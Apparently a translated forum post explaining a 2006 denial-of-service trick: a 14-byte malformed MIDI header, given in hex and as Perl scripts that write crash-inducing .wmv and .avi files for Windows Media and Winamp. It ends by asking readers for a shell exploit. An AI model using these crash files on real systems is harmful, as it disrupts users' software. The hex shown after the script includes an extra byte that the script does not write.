At the end of 2006, I discussed with friends on the Secunia mailing list a Windows Media denial-of-service PoC that a friend abroad had modified. At the time nobody paid much attention to it; the friend and I just exchanged a few words about it, it was released, and I thought no more of it.
Enough time has passed since then that searching for these keywords on milw0rm should turn it up:
H0lly Shit for Windows Media File Denial Of Service Vulnerability
Tested: Windows Media 10.00.00.4036 Windows XP SP2
file "example.mid" or "example.wmv" (Hex-Code):
4D 54 68 64 00 00 00 06 00 00 00 00 00 00
File size = 14 bytes
That same day I also posted it in the information-security section of the Black Union forum, and left the matter there.
Four months later, a lot of similar exploits have appeared. For example:
Winamp <= 5.33 (.AVI File) Remote Denial of Service Exploit
MS Windows Explorer (AVI) Unspecified Denial of Service Exploit
Winamp <= 5.3 (WMV) Buffer Overflow Exploit (0-DAY)
All of these can be found with a Google search; I have of course reposted them in the Black Union information-security section, so anyone interested can look there.
The underlying principle is in fact very simple: it comes down to how a zero value in the header is handled.
The header of a MIDI file looks like this: 4D 54 68 64 00 00 00 06 x1 x2 x3 x4 x5 x6, where x1 to x6 are the control words. x1 x2 specify the file format (whether multiple tracks are played synchronously), x3 x4 specify the number of tracks, and x5 x6 specify the basic time division. 4D 54 68 64 are the ASCII characters "MThd", which identify the file type; 00 00 00 06 is fixed and declares the number of bytes in the control words, i.e. x1~x6.
Once you know this, everything is clear.
For example, the critical code given in "Winamp <= 5.3 (WMV) Buffer Overflow Exploit (0-DAY)" is this:
open(wmv, ">./exploit.wmv");          # create the output file
binmode(wmv);                         # write raw bytes, no newline translation
print wmv "\x4D\x54\x68\x64";         # "MThd" chunk signature
print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";   # length 6, then all-zero control words
close(wmv);
Compare this carefully against the header definition I gave above and you can probably see what is going on.
It simply writes \x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 into the wmv file, and the result is this:
4D 54 68 64 00 00 00 06 00 00 00 00 00 00 31
When the player reads this it naturally fails on the zero values in the control words (a track count of zero, for instance).
Others, such as "Winamp <= 5.33 (.AVI File) Remote Denial of Service Exploit", contain a great deal of redundant code (http://www.cnhacker.com/bbs/read.php?tid=164070&fpage=1).
In fact the following lines are all that is needed:
open(avi, ">./Dr.Trojan.avi");        # create the output file
binmode(avi);                         # write raw bytes, no newline translation
print avi "\x4D\x54\x68\x64";         # "MThd" chunk signature
print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";   # length 6, then all-zero control words
close(avi);
In any case, when someone researches a vulnerability like this, the software ends up improving; and now that so many exploits trace back to this one, it may get some people's attention. Let us wait and see how the player vendors respond.
As for whether it can be exploited to get a shell, I have not found a good method so far; if anyone manages it, don't forget to mail me, thanks.